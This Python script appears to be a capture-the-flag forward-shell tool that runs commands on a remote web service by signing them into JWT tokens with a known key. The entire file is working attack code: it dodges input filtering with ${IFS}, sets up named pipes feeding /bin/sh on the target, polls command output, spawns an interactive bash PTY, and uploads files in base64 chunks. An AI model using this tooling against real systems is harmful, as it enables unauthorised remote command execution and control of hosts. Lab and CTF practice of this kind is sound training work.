#!/usr/bin/python3 # _*_coding: utf-8 _*_ # # Forward Shell Code # Authors: Isaac Parenteau, ippsec, 0xdf import base64 import os import random import requests import threading import time import jwt class WebShell(object): def __init__(self, remote_host='http://172.16.1.22', remote_port=3000, key='hope you enjoy this challenge -ippsec', interval=1.3): """ Constructor :param remote_host: remote host to connect to :param remote_port: remote port to connect to :param key: the key for the web request token :param interval: interval to ping at """ self.url = r"{}:{}".format(remote_host, remote_port) session = random.randrange(10000, 99999) print(f"[*] Session ID: {session}") self.stdin = f'/dev/shm/input.{session}' self.stdout = f'/dev/shm/output.{session}' self.interval = interval self.key = key print(f"[*] Setting up fifo shell on target") make_named_pipes = f'mkfifo {self.stdin}; tail -f {self.stdin}|/bin/sh>{self.stdout}' self.run_raw_command(make_named_pipes, timeout=1) print(f"[*] Setting up read thread") thread = threading.Thread(target=self.read_thread, args=()) thread.daemon = True thread.start() def read_thread(self): """ :return: """ get_output = f"/bin/cat {self.stdout}" while True: result = self.run_raw_command(get_output) if result: print(result) clear_output = f':>{self.stdout}' self.run_raw_command(clear_output) time.sleep(self.interval) def run_raw_command(self, command, timeout=50, space_delimiter='${IFS}'): """ :param command: :param timeout: :param space_delimiter: :return: """ payload = {'cmd': command.replace(' ', space_delimiter)} token = jwt.encode(payload, self.key, algorithm='HS256') headers = {'Authorization': f'Bearer {token.decode()}'} try: r = requests.get(self.url, headers=headers, timeout=timeout) return r.text except: pass def write_command(self, command, timeout=50): """ :param timeout: :param command: :return: """ b64cmd = base64.b64encode('{}\n'.format(command.rstrip()).encode('utf-8')).decode('utf-8') stage_cmd = f'echo {b64cmd} | base64 -d>{self.stdin}' self.run_raw_command(stage_cmd, timeout) time.sleep(self.interval * 1.1) def upgrade_shell(self): """ :return: """ upgrade_shell = """python3 -c '__import__("pty").spawn("/bin/bash")'""" print(upgrade_shell) self.write_command(upgrade_shell) def send_file(self): """ :return: """ file = input("Please enter path to file: ") file_name = os.path.basename(file) print(f'[*] Uploading File {file_name}') self.write_command(f'rm -f /tmp/{file_name}') # clear the file if it exists with open(file, 'rb') as f: b64 = base64.b64encode(f.read()).decode() x = 8192 for i in range(0, len(b64), x): chunk = b64[i:i+x] self.write_command(f'echo {chunk} | base64 -d >> /tmp/{file_name}') print(f'[*] Done Sending File to /tmp/{file_name}') prompt = "Please Subscribe> " s = WebShell() while True: cmd = input(prompt) if cmd == "upgrade": prompt = "" s.upgrade_shell() elif cmd == "upload": s.send_file() elif cmd in ["quit", "exit"]: break else: s.write_command(cmd)